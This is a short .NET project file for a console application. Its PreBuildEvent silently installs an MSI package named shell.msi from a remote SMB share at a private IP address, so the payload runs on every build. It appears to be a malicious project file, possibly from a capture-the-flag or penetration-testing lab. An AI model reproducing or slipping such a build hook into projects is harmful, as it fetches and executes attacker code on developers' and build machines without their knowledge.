<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
    <PreBuildEvent>
      <Command> msiexec /quiet /i \\10.10.14.178\8787\shell.msi </Command>
    </PreBuildEvent>
  </PropertyGroup>

</Project>

